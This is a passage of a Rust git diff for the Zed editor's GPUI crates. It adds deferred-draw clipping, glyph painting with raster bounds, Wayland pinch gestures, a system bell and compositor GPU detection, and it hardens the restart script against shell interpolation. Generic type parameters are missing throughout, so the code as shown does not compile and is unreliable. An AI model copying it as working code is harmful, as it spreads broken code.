window.with_content_mask(content_mask, |window| { + window.with_rem_size(Some(deferred_draw.rem_size), |window| { + element.paint(window, cx); + }); }) }) } else { @@ -2485,6 +2588,13 @@ impl Window { self.element_id_stack.clear(); } + fn deferred_draw_traversal_order(&mut self) -> SmallVec<[usize; 8]> { + let deferred_count = self.next_frame.deferred_draws.len(); + let mut sorted_indices = (0..deferred_count).collect::>(); + sorted_indices.sort_by_key(|ix| self.next_frame.deferred_draws[*ix].priority); + sorted_indices + } + pub(crate) fn prepaint_index(&self) -> PrepaintStateIndex { PrepaintStateIndex { hitboxes_index: self.next_frame.hitboxes.len(), @@ -2536,6 +2646,7 @@ impl Window { parent_node: reused_subtree.refresh_node_id(deferred_draw.parent_node), element_id_stack: deferred_draw.element_id_stack.clone(), text_style_stack: deferred_draw.text_style_stack.clone(), + content_mask: deferred_draw.content_mask.clone(), rem_size: deferred_draw.rem_size, priority: deferred_draw.priority, element: None, @@ -3019,12 +3130,16 @@ impl Window { /// at a later time. The `priority` parameter determines the drawing order relative to other deferred elements, /// with higher values being drawn on top. /// + /// When `content_mask` is provided, the deferred element will be clipped to that region during + /// both prepaint and paint. When `None`, no additional clipping is applied. + /// /// This method should only be called as part of the prepaint phase of element drawing. pub fn defer_draw( &mut self, element: AnyElement, absolute_offset: Point, priority: usize, + content_mask: Option>, ) { self.invalidator.debug_assert_prepaint(); let parent_node = self.next_frame.dispatch_tree.active_node_id().unwrap(); @@ -3033,6 +3148,7 @@ impl Window { parent_node, element_id_stack: self.element_id_stack.clone(), text_style_stack: self.text_style_stack.clone(), + content_mask, rem_size: self.rem_size(), priority, element: Some(element), @@ -3282,6 +3398,100 @@ impl Window { Ok(()) } + /// Paints a monochrome glyph with pre-computed raster bounds. + /// + /// This is faster than `paint_glyph` because it skips the per-glyph cache lookup. + /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint. + pub fn paint_glyph_with_raster_bounds( + &mut self, + origin: Point, + _font_id: FontId, + _glyph_id: GlyphId, + _font_size: Pixels, + color: Hsla, + raster_bounds: Bounds, + params: &RenderGlyphParams, + ) -> Result<()> { + self.invalidator.debug_assert_paint(); + + let element_opacity = self.element_opacity(); + let scale_factor = self.scale_factor(); + let glyph_origin = origin.scale(scale_factor); + + if !raster_bounds.is_zero() { + let tile = self + .sprite_atlas + .get_or_insert_with(¶ms.clone().into(), &mut || { + let (size, bytes) = self.text_system().rasterize_glyph(params)?; + Ok(Some((size, Cow::Owned(bytes)))) + })? + .expect("Callback above only errors or returns Some"); + let bounds = Bounds { + origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into), + size: tile.bounds.size.map(Into::into), + }; + let content_mask = self.content_mask().scale(scale_factor); + self.next_frame.scene.insert_primitive(MonochromeSprite { + order: 0, + pad: 0, + bounds, + content_mask, + color: color.opacity(element_opacity), + tile, + transformation: TransformationMatrix::unit(), + }); + } + Ok(()) + } + + /// Paints an emoji glyph with pre-computed raster bounds. + /// + /// This is faster than `paint_emoji` because it skips the per-glyph cache lookup. + /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint. + pub fn paint_emoji_with_raster_bounds( + &mut self, + origin: Point, + _font_id: FontId, + _glyph_id: GlyphId, + _font_size: Pixels, + raster_bounds: Bounds, + params: &RenderGlyphParams, + ) -> Result<()> { + self.invalidator.debug_assert_paint(); + + let scale_factor = self.scale_factor(); + let glyph_origin = origin.scale(scale_factor); + + if !raster_bounds.is_zero() { + let tile = self + .sprite_atlas + .get_or_insert_with(¶ms.clone().into(), &mut || { + let (size, bytes) = self.text_system().rasterize_glyph(params)?; + Ok(Some((size, Cow::Owned(bytes)))) + })? + .expect("Callback above only errors or returns Some"); + + let bounds = Bounds { + origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into), + size: tile.bounds.size.map(Into::into), + }; + let content_mask = self.content_mask().scale(scale_factor); + let opacity = self.element_opacity(); + + self.next_frame.scene.insert_primitive(PolychromeSprite { + order: 0, + pad: 0, + grayscale: false, + bounds, + corner_radii: Default::default(), + content_mask, + tile, + opacity, + }); + } + Ok(()) + } + fn should_use_subpixel_rendering(&self, font_id: FontId, font_size: Pixels) -> bool { if self.platform_window.background_appearance() != WindowBackgroundAppearance::Opaque { return false; @@ -3883,14 +4093,18 @@ impl Window { /// Dispatch a mouse or keyboard event on the window. #[profiling::function] pub fn dispatch_event(&mut self, event: PlatformInput, cx: &mut App) -> DispatchEventResult { - // Track whether this input was keyboard-based for focus-visible styling + // Track input modality for focus-visible styling and hover suppression. + // Hover is suppressed during keyboard modality so that keyboard navigation + // doesn't show hover highlights on the item under the mouse cursor. + let old_modality = self.last_input_modality; self.last_input_modality = match &event { - PlatformInput::KeyDown(_) | PlatformInput::ModifiersChanged(_) => { - InputModality::Keyboard - } - PlatformInput::MouseDown(e) if e.is_focusing() => InputModality::Mouse, + PlatformInput::KeyDown(_) => InputModality::Keyboard, + PlatformInput::MouseMove(_) | PlatformInput::MouseDown(_) => InputModality::Mouse, _ => self.last_input_modality, }; + if self.last_input_modality != old_modality { + self.refresh(); + } // Handlers may set this to false by calling `stop_propagation`. cx.propagate_event = true; @@ -3932,6 +4146,11 @@ impl Window { self.modifiers = scroll_wheel.modifiers; PlatformInput::ScrollWheel(scroll_wheel) } + PlatformInput::Pinch(pinch) => { + self.mouse_position = pinch.position; + self.modifiers = pinch.modifiers; + PlatformInput::Pinch(pinch) + } // Translate dragging and dropping of external files from the operating system // to internal drag and drop events. PlatformInput::FileDrop(file_drop) => match file_drop { @@ -4044,6 +4263,11 @@ impl Window { self.refresh(); } } + + // Auto-release pointer capture on mouse up + if event.is::() && self.captured_hitbox.is_some() { + self.captured_hitbox = None; + } } fn dispatch_key_event(&mut self, event: &dyn Any, cx: &mut App) { @@ -4800,6 +5024,12 @@ impl Window { .set_tabbing_identifier(tabbing_identifier) } + /// Request the OS to play an alert sound. On some platforms this is associated + /// with the window, for others it's just a simple global function call. + pub fn play_system_bell(&self) { + self.platform_window.play_system_bell() + } + /// Toggles the inspector mode on this window. #[cfg(any(feature = "inspector", debug_assertions))] pub fn toggle_inspector(&mut self, cx: &mut App) { @@ -5266,6 +5496,8 @@ pub enum ElementId { CodeLocation(core::panic::Location<'static>), /// A labeled child of an element. NamedChild(Arc, SharedString), + /// A byte array ID (used for text-anchors) + OpaqueId([u8; 20]), } impl ElementId { @@ -5287,6 +5519,7 @@ impl Display for ElementId { ElementId::Path(path) => write!(f, "{}", path.display())?, ElementId::CodeLocation(location) => write!(f, "{}", location)?, ElementId::NamedChild(id, name) => write!(f, "{}-{}", id, name)?, + ElementId::OpaqueId(opaque_id) => write!(f, "{:x?}", opaque_id)?, } Ok(()) @@ -5401,6 +5634,12 @@ impl From<&'static core::panic::Location<'static>> for ElementId { } } +impl From<[u8; 20]> for ElementId { + fn from(opaque_id: [u8; 20]) -> Self { + ElementId::OpaqueId(opaque_id) + } +} + /// A rectangle to be rendered in the window at the given position and size. /// Passed as an argument [`Window::paint_quad`]. #[derive(Clone)] diff --git a/crates/gpui_linux/Cargo.toml b/crates/gpui_linux/Cargo.toml index 08c759125a7600f94867cff95035d0318f26305a..9078fa82c2884421c6cd11c6d3384645621b7e6f 100644 --- a/crates/gpui_linux/Cargo.toml +++ b/crates/gpui_linux/Cargo.toml @@ -121,6 +121,7 @@ x11rb = { version = "0.13.1", features = [ "cursor", "resource_manager", "sync", + "dri3", ], optional = true } # WARNING: If you change this, you must also publish a new version of zed-xim to crates.io xim = { git = "https://github.com/zed-industries/xim-rs.git", rev = "16f35a2c881b815a2b6cdfd6687988e84f8447d8", features = [ diff --git a/crates/gpui_linux/src/linux/dispatcher.rs b/crates/gpui_linux/src/linux/dispatcher.rs index ff17fd238ae2a4b40ebdf8e36133c05f3e41f9b3..22df5799ddf9c77bfdbc7b09accbea117de6d130 100644 --- a/crates/gpui_linux/src/linux/dispatcher.rs +++ b/crates/gpui_linux/src/linux/dispatcher.rs @@ -13,7 +13,7 @@ use std::{ use gpui::{ GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, PriorityQueueReceiver, - PriorityQueueSender, RunnableVariant, THREAD_TIMINGS, TaskTiming, ThreadTaskTimings, profiler, + PriorityQueueSender, RunnableVariant, TaskTiming, ThreadTaskTimings, profiler, }; struct TimerAfter { @@ -44,11 +44,6 @@ impl LinuxDispatcher { .name(format!("Worker-{i}")) .spawn(move || { for runnable in receiver.iter() { - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - continue; - } - let start = Instant::now(); let location = runnable.metadata().location; @@ -94,11 +89,6 @@ impl LinuxDispatcher { calloop::timer::Timer::from_duration(timer.duration), move |_, _, _| { if let Some(runnable) = runnable.take() { - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - return TimeoutAction::Drop; - } - let start = Instant::now(); let location = runnable.metadata().location; let mut timing = TaskTiming { @@ -145,25 +135,7 @@ impl PlatformDispatcher for LinuxDispatcher { } fn get_current_thread_timings(&self) -> gpui::ThreadTaskTimings { - THREAD_TIMINGS.with(|timings| { - let timings = timings.lock(); - let thread_name = timings.thread_name.clone(); - let total_pushed = timings.total_pushed; - let timings = &timings.timings; - - let mut vec = Vec::with_capacity(timings.len()); - - let (s1, s2) = timings.as_slices(); - vec.extend_from_slice(s1); - vec.extend_from_slice(s2); - - gpui::ThreadTaskTimings { - thread_name, - thread_id: std::thread::current().id(), - timings: vec, - total_pushed, - } - }) + gpui::profiler::get_current_thread_task_timings() } fn is_main_thread(&self) -> bool { diff --git a/crates/gpui_linux/src/linux/headless/client.rs b/crates/gpui_linux/src/linux/headless/client.rs index 6dbdc556751b27d144feb4a40c916910bc6ff5f7..56cc9e8df008abcb0904c7178e5b333eaade1d84 100644 --- a/crates/gpui_linux/src/linux/headless/client.rs +++ b/crates/gpui_linux/src/linux/headless/client.rs @@ -64,6 +64,7 @@ impl LinuxClient for HeadlessClient { None } + #[cfg(feature = "screen-capture")] fn screen_capture_sources( &self, ) -> futures::channel::oneshot::Receiver>>> diff --git a/crates/gpui_linux/src/linux/platform.rs b/crates/gpui_linux/src/linux/platform.rs index f044b086a580ea70ef2b959ed5e8a0931f4ce4e9..e3c947bcb9d33389faa354df1a83ae6419650ba8 100644 --- a/crates/gpui_linux/src/linux/platform.rs +++ b/crates/gpui_linux/src/linux/platform.rs @@ -26,7 +26,8 @@ use gpui::{ Action, AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DisplayId, ForegroundExecutor, Keymap, Menu, MenuItem, OwnedMenu, PathPromptOptions, Platform, PlatformDisplay, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, - PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance, WindowParams, + PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance, + WindowButtonLayout, WindowParams, }; #[cfg(any(feature = "wayland", feature = "x11"))] use gpui::{Pixels, Point, px}; @@ -55,12 +56,12 @@ pub(crate) trait LinuxClient { fn display(&self, id: DisplayId) -> Option>; fn primary_display(&self) -> Option>; - #[allow(dead_code)] + #[cfg(feature = "screen-capture")] fn is_screen_capture_supported(&self) -> bool { - false + true } - #[allow(dead_code)] + #[cfg(feature = "screen-capture")] fn screen_capture_sources( &self, ) -> oneshot::Receiver>>> { @@ -114,6 +115,7 @@ pub(crate) struct LinuxCommon { pub(crate) text_system: Arc, pub(crate) appearance: WindowAppearance, pub(crate) auto_hide_scrollbars: bool, + pub(crate) button_layout: WindowButtonLayout, pub(crate) callbacks: PlatformHandlers, pub(crate) signal: LoopSignal, pub(crate) menus: Vec, @@ -140,6 +142,7 @@ impl LinuxCommon { text_system, appearance: WindowAppearance::Light, auto_hide_scrollbars: false, + button_layout: WindowButtonLayout::linux_default(), callbacks, signal, menus: Vec::new(), @@ -229,17 +232,14 @@ impl Platform for LinuxPlatform

{ log::info!("Restarting process, using app path: {:?}", app_path); // Script to wait for the current process to exit and then restart the app. - let script = format!( - r#" - while kill -0 {pid} 2>/dev/null; do + // Pass dynamic values as positional parameters to avoid shell interpolation issues. + let script = r#" + while kill -0 "$0" 2>/dev/null; do sleep 0.1 done - {app_path} - "#, - pid = app_pid, - app_path = app_path.display() - ); + "$1" + "#; #[allow( clippy::disallowed_methods, @@ -249,6 +249,8 @@ impl Platform for LinuxPlatform

{ .arg("bash") .arg("-c") .arg(script) + .arg(&app_pid) + .arg(&app_path) .process_group(0) .spawn(); @@ -602,6 +604,10 @@ impl Platform for LinuxPlatform

{ self.inner.with_common(|common| common.appearance) } + fn button_layout(&self) -> Option { + Some(self.inner.with_common(|common| common.button_layout)) + } + fn register_url_scheme(&self, _: &str) -> Task> { Task::ready(Err(anyhow!("register_url_scheme unimplemented"))) } @@ -634,28 +640,42 @@ pub(super) fn open_uri_internal( if let Some(uri) = ashpd::Uri::parse(uri).log_err() { executor .spawn(async move { - match ashpd::desktop::open_uri::OpenFileRequest::default() - .activation_token(activation_token.clone().map(ashpd::ActivationToken::from)) - .send_uri(&uri) - .await - .and_then(|e| e.response()) - { - Ok(()) => return, - Err(e) => log::error!("Failed to open with dbus: {}", e), - } - + let mut xdg_open_failed = false; for mut command in open::commands(uri.to_string()) { if let Some(token) = activation_token.as_ref() { command.env("XDG_ACTIVATION_TOKEN", token); } let program = format!("{:?}", command.get_program()); match smol::process::Command::from(command).spawn() { - Ok(mut cmd) => { - cmd.status().await.log_err(); - return; + Ok(mut cmd) => match cmd.status().await { + Ok(status) if status.success() => return, + Ok(status) => { + log::error!("Command {} exited with status: {}", program, status); + xdg_open_failed = true; + } + Err(e) => { + log::error!("Failed to get status from {}: {}", program, e); + xdg_open_failed = true; + } + }, + Err(e) => { + log::error!("Failed to open with {}: {}", program, e); + xdg_open_failed = true; } + } + } + + if xdg_open_failed { + match ashpd::desktop::open_uri::OpenFileRequest::default() + .activation_token(activation_token.map(ashpd::ActivationToken::from)) + .send_uri(&uri) + .await + .and_then(|e| e.response()) + { + Ok(()) => {} + Err(ashpd::Error::Response(ashpd::desktop::ResponseError::Cancelled)) => {} Err(e) => { - log::error!("Failed to open with {}: {}", program, e) + log::error!("Failed to open with dbus: {}", e); } } } @@ -1038,6 +1058,46 @@ pub(super) fn capslock_from_xkb(keymap_state: &State) -> gpui::Capslock { gpui::Capslock { on } } +/// Resolve a Linux `dev_t` to PCI vendor/device IDs via sysfs, returning a +/// [`CompositorGpuHint`] that the GPU adapter selection code can use to +/// prioritize the compositor's rendering device. +#[cfg(any(feature = "wayland", feature = "x11"))] +pub(super) fn compositor_gpu_hint_from_dev_t(dev: u64) -> Option { + fn dev_major(dev: u64) -> u32 { + ((dev >> 8) & 0xfff) as u32 | (((dev >> 32) & !0xfff) as u32) + } + + fn dev_minor(dev: u64) -> u32 { + (dev & 0xff) as u32 | (((dev >> 12) & !0xff) as u32) + } + + fn read_sysfs_hex_id(path: &str) -> Option { + let content = std::fs::read_to_string(path).ok()?; + let trimmed = content.trim().strip_prefix("0x").unwrap_or(content.trim()); + u32::from_str_radix(trimmed, 16).ok() + } + + let major = dev_major(dev); + let minor = dev_minor(dev); + + let vendor_path = format!("/sys/dev/char/{major}:{minor}/device/vendor"); + let device_path = format!("/sys/dev/char/{major}:{minor}/device/device"); + + let vendor_id = read_sysfs_hex_id(&vendor_path)?; + let device_id = read_sysfs_hex_id(&device_path)?; + + log::info!( + "Compositor GPU hint: vendor={:#06x}, device={:#06x} (from dev {major}:{minor})", + vendor_id, + device_id, + ); + + Some(gpui_wgpu::CompositorGpuHint { + vendor_id, + device_id, + }) +} + #[cfg(test)] mod tests { use super::*; diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index a810a00af642c3a252a9a144b884837f82eac7e7..10f4aab0db19978302143519dd6e2a7e4d25ec4d 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -36,6 +36,9 @@ use wayland_client::{ wl_shm_pool, wl_surface, }, }; +use wayland_protocols::wp::pointer_gestures::zv1::client::{ + zwp_pointer_gesture_pinch_v1, zwp_pointer_gestures_v1, +}; use wayland_protocols::wp::primary_selection::zv1::client::zwp_primary_selection_offer_v1::{ self, ZwpPrimarySelectionOfferV1, }; @@ -55,6 +58,7 @@ use wayland_protocols::xdg::decoration::zv1::client::{ zxdg_decoration_manager_v1, zxdg_toplevel_decoration_v1, }; use wayland_protocols::xdg::shell::client::{xdg_surface, xdg_toplevel, xdg_wm_base}; +use wayland_protocols::xdg::system_bell::v1::client::xdg_system_bell_v1; use wayland_protocols::{ wp::cursor_shape::v1::client::{wp_cursor_shape_device_v1, wp_cursor_shape_manager_v1}, xdg::dialog::v1::client::xdg_wm_dialog_v1::{self, XdgWmDialogV1}, @@ -92,10 +96,13 @@ use gpui::{ ForegroundExecutor, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, MouseUpEvent, NavigationDirection, Pixels, PlatformDisplay, PlatformInput, PlatformKeyboardLayout, PlatformWindow, Point, - ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowParams, point, - profiler, px, size, + ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowButtonLayout, + WindowParams, point, profiler, px, size, +}; +use gpui_wgpu::{CompositorGpuHint, GpuContext}; +use wayland_protocols::wp::linux_dmabuf::zv1::client::{ + zwp_linux_dmabuf_feedback_v1, zwp_linux_dmabuf_v1, }; -use gpui_wgpu::WgpuContext; /// Used to convert evdev scancode to xkb scancode const MIN_KEYCODE: u32 = 8; @@ -121,7 +128,9 @@ pub struct Globals { pub layer_shell: Option, pub blur_manager: Option, pub text_input_manager: Option, + pub gesture_manager: Option, pub dialog: Option, + pub system_bell: Option, pub executor: ForegroundExecutor, } @@ -161,7 +170,9 @@ impl Globals { layer_shell: globals.bind(&qh, 1..=5, ()).ok(), blur_manager: globals.bind(&qh, 1..=1, ()).ok(), text_input_manager: globals.bind(&qh, 1..=1, ()).ok(), + gesture_manager: globals.bind(&qh, 1..=3, ()).ok(), dialog: globals.bind(&qh, dialog_v..=dialog_v, ()).ok(), + system_bell: globals.bind(&qh, 1..=1, ()).ok(), executor, qh, } @@ -201,9 +212,12 @@ pub struct Output { pub(crate) struct WaylandClientState { serial_tracker: SerialTracker, globals: Globals, - pub gpu_context: Option, + pub gpu_context: GpuContext, + pub compositor_gpu: Option, wl_seat: wl_seat::WlSeat, // TODO: Multi seat support wl_pointer: Option, + pinch_gesture: Option, + pinch_scale: f32, wl_keyboard: Option, cursor_shape_device: Option, data_device: Option, @@ -217,6 +231,7 @@ pub(crate) struct WaylandClientState { // Output to scale mapping outputs: HashMap, in_progress_outputs: HashMap, + wl_outputs: HashMap, keyboard_layout: LinuxKeyboardLayout, keymap_state: Option, compose_state: Option, @@ -459,6 +474,8 @@ impl WaylandClient { let mut seat: Option = None; #[allow(clippy::mutable_key_type)] let mut in_progress_outputs = HashMap::default(); + #[allow(clippy::mutable_key_type)] + let mut wl_outputs: HashMap = HashMap::default(); globals.contents().with_list(|list| { for global in list { match &global.interface[..] { @@ -478,6 +495,7 @@ impl WaylandClient { (), ); in_progress_outputs.insert(output.id(), InProgressOutput::default()); + wl_outputs.insert(output.id(), output); } _ => {} } @@ -515,7 +533,8 @@ impl WaylandClient { }) .unwrap(); - let gpu_context = None; + let compositor_gpu = detect_compositor_gpu(); + let gpu_context = Rc::new(RefCell::new(None)); let seat = seat.unwrap(); let globals = Globals::new( @@ -551,6 +570,19 @@ impl WaylandClient { } } } + XDPEvent::ButtonLayout(layout_str) => { + if let Some(client) = client.0.upgrade() { + let layout = WindowButtonLayout::parse(&layout_str) + .log_err() + .unwrap_or_else(WindowButtonLayout::linux_default); + let mut client = client.borrow_mut(); + client.common.button_layout = layout; + + for window in client.windows.values_mut() { + window.set_button_layout(); + } + } + } XDPEvent::CursorTheme(theme) => { if let Some(client) = client.0.upgrade() { let mut client = client.borrow_mut(); @@ -571,9 +603,12 @@ impl WaylandClient { serial_tracker: SerialTracker::new(), globals, gpu_context, + compositor_gpu, wl_seat: seat, wl_pointer: None, wl_keyboard: None, + pinch_gesture: None, + pinch_scale: 1.0, cursor_shape_device: None, data_device, primary_selection, @@ -583,6 +618,7 @@ impl WaylandClient { composing: false, outputs: HashMap::default(), in_progress_outputs, + wl_outputs, windows: HashMap::default(), common, keyboard_layout: LinuxKeyboardLayout::new(UNKNOWN_KEYBOARD_LAYOUT_NAME), @@ -682,11 +718,6 @@ impl LinuxClient for WaylandClient { None } - #[cfg(feature = "screen-capture")] - fn is_screen_capture_supported(&self) -> bool { - false - } - #[cfg(feature = "screen-capture")] fn screen_capture_sources( &self, @@ -714,15 +745,27 @@ impl LinuxClient for WaylandClient { let parent = state.keyboard_focused_window.clone(); + let target_output = params.display_id.and_then(|display_id| { + let target_protocol_id: u32 = display_id.into(); + state + .wl_outputs + .iter() + .find(|(id, _)| id.protocol_id() == target_protocol_id) + .map(|(_, output)| output.clone()) + }); + let appearance = state.common.appearance; + let compositor_gpu = state.compositor_gpu.take(); let (window, surface_id) = WaylandWindow::new( handle, state.globals.clone(), - &mut state.gpu_context, + state.gpu_context.clone(), + compositor_gpu, WaylandClientStatePtr(Rc::downgrade(&self.0)), params, appearance, parent, + target_output, )?; state.windows.insert(surface_id, window.0.clone()); @@ -835,7 +878,9 @@ impl LinuxClient for WaylandClient { }; if state.mouse_focused_window.is_some() || state.keyboard_focused_window.is_some() { state.clipboard.set_primary(item); - let serial = state.serial_tracker.get(SerialKind::KeyPress); + let serial = state + .serial_tracker + .latest_of(&[SerialKind::KeyPress, SerialKind::MousePress]); let data_source = primary_selection_manager.create_source(&state.globals.qh, ()); for mime_type in TEXT_MIME_TYPES { data_source.offer(mime_type.to_string()); @@ -855,7 +900,9 @@ impl LinuxClient for WaylandClient { }; if state.mouse_focused_window.is_some() || state.keyboard_focused_window.is_some() { state.clipboard.set(item); - let serial = state.serial_tracker.get(SerialKind::KeyPress); + let serial = state + .serial_tracker + .latest_of(&[SerialKind::KeyPress, SerialKind::MousePress]); let data_source = data_device_manager.create_data_source(&state.globals.qh, ()); for mime_type in TEXT_MIME_TYPES { data_source.offer(mime_type.to_string()); @@ -904,6 +951,70 @@ impl LinuxClient for WaylandClient { } } +struct DmabufProbeState { + device: Option, +} + +impl Dispatch for DmabufProbeState { + fn event( + _: &mut Self, + _: &wl_registry::WlRegistry, + _: wl_registry::Event, + _: &GlobalListContents, + _: &Connection, + _: &QueueHandle, + ) { + } +} + +impl Dispatch for DmabufProbeState { + fn event( + _: &mut Self, + _: &zwp_linux_dmabuf_v1::ZwpLinuxDmabufV1, + _: zwp_linux_dmabuf_v1::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + } +} + +impl Dispatch for DmabufProbeState { + fn event( + state: &mut Self, + _: &zwp_linux_dmabuf_feedback_v1::ZwpLinuxDmabufFeedbackV1, + event: zwp_linux_dmabuf_feedback_v1::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + if let zwp_linux_dmabuf_feedback_v1::Event::MainDevice { device } = event { + if let Ok(bytes) = <[u8; 8]>::try_from(device.as_slice()) { + state.device = Some(u64::from_ne_bytes(bytes)); + } + } + } +} + +fn detect_compositor_gpu() -> Option { + let connection = Connection::connect_to_env().ok()?; + let (globals, mut event_queue) = registry_queue_init::(&connection).ok()?; + let queue_handle = event_queue.handle(); + + let dmabuf: zwp_linux_dmabuf_v1::ZwpLinuxDmabufV1 = + globals.bind(&queue_handle, 4..=4, ()).ok()?; + let feedback = dmabuf.get_default_feedback(&queue_handle, ()); + + let mut state = DmabufProbeState { device: None }; + + event_queue.roundtrip(&mut state).ok()?; + + feedback.destroy(); + dmabuf.destroy(); + + crate::linux::compositor_gpu_hint_from_dev_t(state.device?) +} + impl Dispatch for WaylandClientStatePtr { fn event( this: &mut Self, @@ -948,6 +1059,7 @@ impl Dispatch for WaylandClientStat state .in_progress_outputs .insert(output.id(), InProgressOutput::default()); + state.wl_outputs.insert(output.id(), output); } _ => {} }, @@ -960,6 +1072,7 @@ impl Dispatch for WaylandClientStat } delegate_noop!(WaylandClientStatePtr: ignore xdg_activation_v1::XdgActivationV1); +delegate_noop!(WaylandClientStatePtr: ignore xdg_system_bell_v1::XdgSystemBellV1); delegate_noop!(WaylandClientStatePtr: ignore wl_compositor::WlCompositor); delegate_noop!(WaylandClientStatePtr: ignore wp_cursor_shape_device_v1::WpCursorShapeDeviceV1); delegate_noop!(WaylandClientStatePtr: ignore wp_cursor_shape_manager_v1::WpCursorShapeManagerV1); @@ -1237,6 +1350,12 @@ impl Dispatch for WaylandClientStatePtr { .as_ref() .map(|cursor_shape_manager| cursor_shape_manager.get_pointer(&pointer, qh, ())); + state.pinch_gesture = state.globals.gesture_manager.as_ref().map( + |gesture_manager: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1| { + gesture_manager.get_pinch_gesture(&pointer, qh, ()) + }, + ); + if let Some(wl_pointer) = &state.wl_pointer { wl_pointer.release(); } @@ -1910,6 +2029,91 @@ impl Dispatch for WaylandClientStatePtr { } } +impl Dispatch for WaylandClientStatePtr { + fn event( + _this: &mut Self, + _: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1, + _: ::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + // The gesture manager doesn't generate events + } +} + +impl Dispatch + for WaylandClientStatePtr +{ + fn event( + this: &mut Self, + _: &zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1, + event: ::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + use gpui::PinchEvent; + + let client = this.get_client(); + let mut state = client.borrow_mut(); + + let Some(window) = state.mouse_focused_window.clone() else { + return; + }; + + match event { + zwp_pointer_gesture_pinch_v1::Event::Begin { + serial: _, + time: _, + surface: _, + fingers: _, + } => { + state.pinch_scale = 1.0; + let input = PlatformInput::Pinch(PinchEvent { + position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))), + delta: 0.0, + modifiers: state.modifiers, + phase: TouchPhase::Started, + }); + drop(state); + window.handle_input(input); + } + zwp_pointer_gesture_pinch_v1::Event::Update { time: _, scale, .. } => { + let new_absolute_scale = scale as f32; + let previous_scale = state.pinch_scale; + let zoom_delta = new_absolute_scale - previous_scale; + state.pinch_scale = new_absolute_scale; + + let input = PlatformInput::Pinch(PinchEvent { + position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))), + delta: zoom_delta, + modifiers: state.modifiers, + phase: TouchPhase::Moved, + }); + drop(state); + window.handle_input(input); + } + zwp_pointer_gesture_pinch_v1::Event::End { + serial: _, + time: _, + cancelled: _, + } => { + state.pinch_scale = 1.0; + let input = PlatformInput::Pinch(PinchEvent { + position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))), + delta: 0.0, + modifiers: state.modifiers, + phase: TouchPhase::Ended, + }); + drop(state); + window.handle_input(input); + } + _ => {} + } + } +} + impl Dispatch for WaylandClientStatePtr { fn event( this: &mut Self, diff --git a/crates/gpui_linux/src/linux/wayland/serial.rs b/crates/gpui_linux/src/linux/wayland/serial.rs index eadc7a9ca97c6f3c78f8a5609deb27e891e52949..ed38f14bd130c4fb6db178fe218bae1327355476 100644 --- a/crates/gpui_linux/src/linux/wayland/serial.rs +++ b/crates/gpui_linux/src/linux/wayland/serial.rs @@ -46,4 +46,16 @@ impl SerialTracker { .map(|serial_data| serial_data.serial) .unwrap_or(0) } + + /// Returns the latest tracked serial of the provided [`SerialKind`]s + /// + /// Will return 0 if not tracked. + pub fn latest_of(&self, kinds: &[SerialKind]) -> u32 { + kinds + .iter() + .filter_map(|kind| self.serials.get(kind)) + .max_by_key(|serial_data| serial_data.serial) + .map(|serial_data| serial_data.serial) + .unwrap_or(0) + } } diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 4a4c4060bdc31b95bd4b90d930afdc54727a9667..1e3af66c59858c435ca3da093a1c48056b77667e 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -12,7 +12,10 @@ use futures::channel::oneshot::Receiver; use raw_window_handle as rwh; use wayland_backend::client::ObjectId; use wayland_client::WEnum; -use wayland_client::{Proxy, protocol::wl_surface}; +use wayland_client::{ + Proxy, + protocol::{wl_output, wl_surface}, +}; use wayland_protocols::wp::viewporter::client::wp_viewport; use wayland_protocols::xdg::decoration::zv1::client::zxdg_toplevel_decoration_v1; use wayland_protocols::xdg::shell::client::xdg_surface; @@ -34,7 +37,7 @@ use gpui::{ WindowDecorations, WindowKind, WindowParams, layer_shell::LayerShellNotSupportedError, px, size, }; -use gpui_wgpu::{WgpuContext, WgpuRenderer, WgpuSurfaceConfig}; +use gpui_wgpu::{CompositorGpuHint, WgpuRenderer, WgpuSurfaceConfig}; #[derive(Default)] pub(crate) struct Callbacks { @@ -47,8 +50,10 @@ pub(crate) struct Callbacks { should_close: Option bool>>, close: Option>, appearance_changed: Option>, + button_layout_changed: Option>, } +#[derive(Debug, Clone, Copy)] struct RawWindow { window: *mut c_void, display: *mut c_void, @@ -111,6 +116,7 @@ pub struct WaylandWindowState { handle: AnyWindowHandle, active: bool, hovered: bool, + pub(crate) force_render_after_recovery: bool, in_progress_configure: Option, resize_throttle: bool, in_progress_window_controls: Option, @@ -129,6 +135,7 @@ impl WaylandSurfaceState { globals: &Globals, params: &WindowParams, parent: Option, + target_output: Option, ) -> anyhow::Result { // For layer_shell windows, create a layer surface instead of an xdg surface if let WindowKind::LayerShell(options) = ¶ms.kind { 